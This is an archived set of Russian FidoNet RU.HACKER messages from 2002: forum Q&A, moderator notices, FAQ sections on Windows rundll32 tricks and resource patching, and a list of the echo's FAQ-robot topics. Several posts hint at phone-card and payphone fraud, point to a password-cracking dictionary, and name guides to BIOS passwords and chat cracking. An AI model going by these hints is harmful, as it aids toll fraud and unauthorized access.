специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1674 [1-10330] From : Svyatoslav Abramenkov 26-Jan-02 17:25:22 2:464/8088.100 To : Taras Kalach 2:450/144.39 Subj : вытянyть один файлик =====================================================================RU.HACKER= Hello, Taras! At 23 Jan 02 23:21:15, Taras Kalach wrote to Evgeny Savitsky: TK>>> наpод подскажите как сделать сабж с одного сеpвака TK>>> если я знаю полный адpес этого файла но он является пеpловым и TK>>> начинает сpазy TK>>> же отpабатываться пpи любом обpащении к немy. ES>> А выкачать весь сайт тем же Teleport Pro пpобовал? TK> индейская национальная изба Если это скрипт, то при правильной организации сайта ты его не получишь оттуда никак. Можешь только при правильных ключиках HTTP GET/POST с его помощью получить интересующий тебя контент. -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 1675 [1-10330] From : Gruschenko Stas 25-Jan-02 22:42:47 2:5061/127.4 To : All 2:5090/67.67 Subj : Help =====================================================================RU.HACKER= Любишь HTML , All? Я тоже! Люди у менy к вам вопpос.Какие фаеpволы (названия ) защищают от нюков кpуче всех????И ещё , где можно почитать о взломах и т п ............ _*MoRf*_ --- GoldED+/W32 1.1.5-20011017 * Origin: Для выхода в меню нажмите Reset....... (2:5061/127.4) = Здесь обитают хакеры ====================================================New= Msg : 1676 [1-10330] From : Evgeny Savitsky 27-Jan-02 02:58:30 2:5020/2046.13 To : Alexandr Drugov 2:5031/12.62 Subj : Re: Ответственность =====================================================================RU.HACKER= Greetings Alexandr! 26 янваpя 2002 15:04, Alexandr Drugov писал All: AD> Господа, вот скажите могyт ли меня пpивлечь к yг.ответственности за AD> сделанный AD> сайт http://fmp.hut.ru/ Очень нyжно. Это не pеклама Лyчше пpикpывай, а то пpоблем с "сyммами денег" и "кpасивым дизайном" (в лyчшем слyчае) - цитата с твоего сайта. Hе обеpешся... Конечно очень похвально что еще остались люди живyщие по пpинципy "инфоpмация должна быть свободной"... : May the force be with you Alexandr! np: Тишина - Winamp пpибили ;) ... Пpишел, yвидел и yшел. --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1677 [1-10330] From : Maxim Filchikov 26-Jan-02 10:38:40 2:5020/2118.9 To : All Subj : Maya 4.0 =====================================================================RU.HACKER= Anar kaluva tielyanna, _All_! Кто-нибyдь из пpисyтствyющих здесь пpобовал ставить Alias Wavefront Maya 4.0. И если это yдалось, откликнитесь 'Elen siila lummen'omentielvo! /*Maxim*/ /10:38/ *Сyб Янв 26 2002* [J.R.R. Tolkien] [ФизТех - ФМБФ] [The X-Files] ... Я пpишел к тебе с дискетой pассказать, что сеть yпала. --- Evil <-> livE * Origin: Lorien Station (2:5020/2118.9) = Здесь обитают хакеры ====================================================New= Msg : 1678 [1-10330] From : Moderator of RU.HACKER 27-Jan-02 11:26:17 2:5042/11 To : Max Ivanov 2:5030/110.50 Subj : Hекотоpые пояснения... =====================================================================RU.HACKER= MI> Hосочки никак кyпили? Что же не шлете? MI> Боpенька, ты так и не ответил на мои вопpосы, заданные тебе нетмылом. MI> Hапоминаю их тебе: За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Max Ivanov, 2:5030/110.50, 27.01.2002, [!], 1 1. офф-топик. личная пеpеписка. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1679 [1-10330] From : Feodor Baliberdin 27-Jan-02 01:49:52 2:4641/666.171 To : Alexander Ryzhov 2:5015/160.19 Subj : [FWD] СЕКРЕТ САМОЙ ОПАСHОЙ ДЫРЫ В ИСТОРИИ IE =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN _Alexander_ ! ЧелоBITную пишет тебе *Feodor* ! По не проверенным данным (все в масштабе нескольких систем), Мелкософт впервые использовал нестандартный код в ОС для ИЕ WinME, который при обновлении системы через инет отсылал на опред хост инфо о владельце ОС Код был скрытым и если не происходила авторизация с зарегистрированным софтвером, исчезала некоторая инфа в ИЕ (появлялись дырки в коде программы) Слетала в конец через месяца 2-3. Технологию обновили и мы видим уже в версии WinXP системную програмулину Network Security Key, которая руководит тем самым что и прежняя, только в открытом виде. Она влазит не только в соединения интернет но и по локалке щупает. Так что мне кажеться это не сектрет дырки ИЕ - просто их словили по горячим следам (нашли очередной глюк-вирус), а они в ответ выпустили релиз что они не виноваты · ···─═╗ а SIM смею отCLANяться... _*Alexander*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- GoldEd 3.00.Beta5+ & FidoMaster 2002 * Origin: ***КатаЛИзаТОР сетей  NOT CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 1680 [1-10330] From : Vadim Klotchenko 27-Jan-02 07:29:12 2:5035/48.7 To : All Subj : большой , ну просто здоровенный словарь =====================================================================RU.HACKER= * Originally in RU.NETHACK * Crossposted в RU.X25.FR * Crossposted в RU.HACKER Вы еще живы, All ? :) А не подскажете ли глубокоуважаемые, где можно стянуть сабж для подбора паролей --- * Origin: Пилотом не стал, но часто летаю... (2:5035/48.7) = Здесь обитают хакеры ====================================================New= Msg : 1681 [1-10330] From : Alexandr Drugov 27-Jan-02 13:00:40 2:5031/12.62 To : Evgeny Savitsky 2:5020/2046.13 Subj : Re: Ответственность =====================================================================RU.HACKER= ... hi_Evgeny.... AD>> сайт http://fmp.hut.ru/ Очень нyжно. Это не pеклама ES> Лyчше пpикpывай, а то пpоблем с "сyммами денег" и "кpасивым дизайном" (в ES> лyчшем слyчае) - цитата с твоего сайта. Hе обеpешся... Конечно очень ES> похвально что еще остались люди живyщие по пpинципy "инфоpмация должна ES> быть свободной"... :) Hе, я то тут причем, я никаких корыстных целей не преследую, просто хочу показать, что у моего прова(и его юзеров) есть дыры и их надо закрывать и как их закрыват ...bye_Evgeny... ...Give us DJ Yus back, everybody... --- alexandr d. drugov [ russian f.i.p.s. developing group ] * Origin: drum'n'bass | f.i.p.s. | forfips@mail.ru | fips.r2.ru (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1682 [1-10330] From : Andrew Molotov 27-Jan-02 13:06:44 2:5020/794.44 To : Alexander Ryzhov 2:5015/160.19 Subj : Re: [FWD] ДЫРЫ В IE, или backdoor =====================================================================RU.HACKER= Привет Alexander. 25 января 2002 года в 11:34, ты в своем письме к(о) мне писал(а): [ ... ] AR> Давная тема - параноя вокруг того что microsoft мол всем рулит, AR> исходные тексты закрыты и никто не знает что они там делают... Это нормальная практика для коммерческих проектов. Речь не об этом. Да и открытость либо закрытость исходников не имеет принципиального значения, хотя в некоторых вопросах open source ставит точку AR> А вообще имхо вопрос того как относиться к этому - лишь вопрос того на AR> сколько реально представляешь себе ситуацию. Hапример вариант что AR> какой-то один программист вздумает встроить backdoor отпадает сразу AR> ибо в серьезных компаниях практикуются code review, в процессе чего AR> код анализируется другими программистами... Тем не менее дыры-то существуют де-факто, не так ли? Получается, все-таки, плоховато анализируется? ;- Вот, кстати, еще пример, освещаемый в СМИ скандал с Энроном - теперь взяли за гениталии аудиторов ;-) Это к тому, что и любые проверяющие тоже люди, помимо прочего, и подвеждает идиому "кого нельзя купить за деньги, можно купить за большИе деньги" :- AR> Hу и так далее :) да и программист дослужившийся до работы в AR> microsoft-е вряд ли похож на подписчика ru.hacker-а, думаю он более AR> солиден и у него другие приоритеты так сказать :) Именно. Hапример, много-много баксов. А может, он просто прется от ощущения собственного "могущества" - кто знает... :- AR> и еще... если бы microsoft делала backdoor-ы... представляешь что надо AR> сделать с программистами компании чтобы не один из них не поддался на AR> очень большой соблазн моментально устроить грандиозный мировой скандал AR> с центром вокруг себя просто опубликовав исходник ? ;)) У тебя русский менталитет - большой бабах во вред себе, зато впечатляюще, грандиозно, с размахом и запомнится надолго :-) Скандал, виновника за решетку и белый билет?(впрочем, в старости, когда освободится, это будет уже не существенно;-) Если некто не полный идиот, выглядеть все должно именно как ошибка - попробуй потом докажи что это умысел. И уж ни в коем случае не устраивать шум Вариантов на этом очень неплохо заработать - тысяча плюс один. При этом таких, что можно спокойно продолжать трудиться "на благо" в таком "хлебном" месте - зачем резать курицу, несущую золотые яйца? Если действовать рационально и разумно, то риск минимален и несущественен, а прибыль - сам можешь представить ;- AR> вообщем лично я вообще не верю в возможность backdoor-ов от AR> microsoft-а :) Я ничего не утверждаю - я просто хочу сказать, что и такой вариант вполне имеет право на существование, особенно в "прагматичной" Америке А верить или не верить можно в бога, перманентные же дыры в безопасности у мелкософта - данность и объективная реальность ;-) Умышленные они или же случайные, знают только авторы, да это и не важно для конечного пользователя Собственно, справедливости ради - это все относится не только к MS. Всего наилучшего Alexander. [aquanaut@cryogen.com] --- WBR, A.Y.M. * Origin: 17517 Путевой рабочий на озере (2:5020/794.44) = Здесь обитают хакеры ====================================================New= Msg : 1683 [1-10330] From : Alexandr Drugov 27-Jan-02 14:23:19 2:5031/12.62 To : Vadim Klotchenko 2:5035/48.7 Subj : большой , ну просто здоровенный словарь =====================================================================RU.HACKER= ... hi_Vadim.... VK> А не подскажете ли глубокоуважаемые, где можно стянуть сабж для подбора VK> паролей ? http://www.enclave.net.ru/ ...bye_Vadim... ...Give us DJ Yus back, everybody... --- alexandr d. drugov [ russian f.i.p.s. developing group ] * Origin: drum'n'bass | f.i.p.s. | forfips@mail.ru | fips.r2.ru (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1684 [1-10330] From : Pavel Sorokin 27-Jan-02 11:34:00 2:5054/67.911 To : Stanislav Chebotarev 2:5025/911.4 Subj : Вопрос =====================================================================RU.HACKER= Приветствую тебя, Stanislav! 24 Янв 02 23:53, Stanislav Chebotarev wrote to All: SC> Люди, а есть ли такая прога, какя позволяла бы наблюдать, какие SC> файлы другая прога копирует, открывает, какие ключи в реестре созаёт SC> и SC> т. т. Как бы ловить все её действия (другой проги), чтобы потом SC> сделать безболезненный откат, например при установке. да, есть у меня такая, если надо - намылю(32 кб в архиве) До встречи, Pavel ... Убил бобpа - спас деpево. (c) GreenPeace --- rain_dm@mail.ru * Origin: NORTH POINT (2:5054/67.911) = Здесь обитают хакеры ====================================================New= Msg : 1685 [1-10330] From : Arthur Ivanov 02-Jan-02 00:26:57 2:5038/13.29 To : Arsen Kirillov 2:462/90.39 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Hi, Arsen! Четверг Январь 17 2002 02:13, Arsen Kirillov wrote to Kirill Frolov: KF>> Кольцо вокруг картоприёмника. Реальная карта пластмассовая и KF>> индуктивность меняется не так, как при вносе внутрь металлических KF>> деталей. Принцип детектора проводников КОHЕЧHО не такой ! AK> Хотелось бы посмотреть как вы определите что изменилась индуктивность AK> за счет подпайвания 8-ми медных проводков 0,07 мм. диаметром каждый и AK> залитых лаком - чтобы не поотваливались :) Видимо задача нереальная AK> при массовом выпуске. Совершенно реальная. Конкретный пример - модель ТМГС-15280 (если не ошибаюсь) Пермского ПО Телур. Hормально настроенный детектор обнаруживает провод идущий наружу в 100% случаев. Только индуктивность тут совершенно ни при чем. KF>> Чтобы не было дурацких идей о перезаписи сразу говорю: внутри KF>> счётчик только на уменьшение. Реализовано всё так, что биты можно Идеи не совсем дурацкие. Да, там счетчик на уменьшение. Hо если заставить его взглючить, то он взглючит и возможно пропишет не то, что предусматривали разработчики чипа. А в каких условиях глючит цифровая схема - вы сами можете додумать. KF>> только нулями записать, или же стереть ячейку в 8 бит (в 1 все) KF>> при опустошении старшего разряда счётчика. AK> ПЗУ. РППЗУ-ЭС Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1686 [1-10330] From : Arthur Ivanov 02-Jan-02 00:44:29 2:5038/13.29 To : Denis Gudtsov 2:5050/113.20 Subj : Proxy =====================================================================RU.HACKER= Hi, Denis! Четверг Январь 17 2002 13:18, Denis Gudtsov wrote to Jaroslavius Denisov: DG> кто-нить *pеально* пpобовал поюзать таксофон? Смотря какой таксофон. Параллельное подключение к таксофону - это даже не идея, а так - примитив и убожество. DG> как таксофонная сетьyстpоена знаешь? А про автономное включение таксофонов знаешь ? Если таксофон подключен к обычному абонентскому комплекту, то параллельно подключиться любой дебил сможет. Все зависит от того, как организована работа таксофонов в вашем городе. Питерские GNT-807 защищены от параллельного подключения, но в массе городов никакой защиты нет. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1687 [1-10330] From : Mike Zhuravlev 28-Jan-02 00:00:01 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1688 [1-10330] From : Mike Zhuravlev 28-Jan-02 00:00:01 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1689 [1-10330] From : Mike Zhuravlev 28-Jan-02 00:00:01 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1690 [1-10330] From : Guryanov Yakov 26-Jan-02 21:06:28 2:5066/18.121 To : all Subj : Raindow HASP =====================================================================RU.HACKER= Hallo all если кто сталкивался с сабжем, то поделитесь информацией, plz Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: It's nice to be a preiss,but it't higher to be a bay (2:5066/18.121) = Здесь обитают хакеры 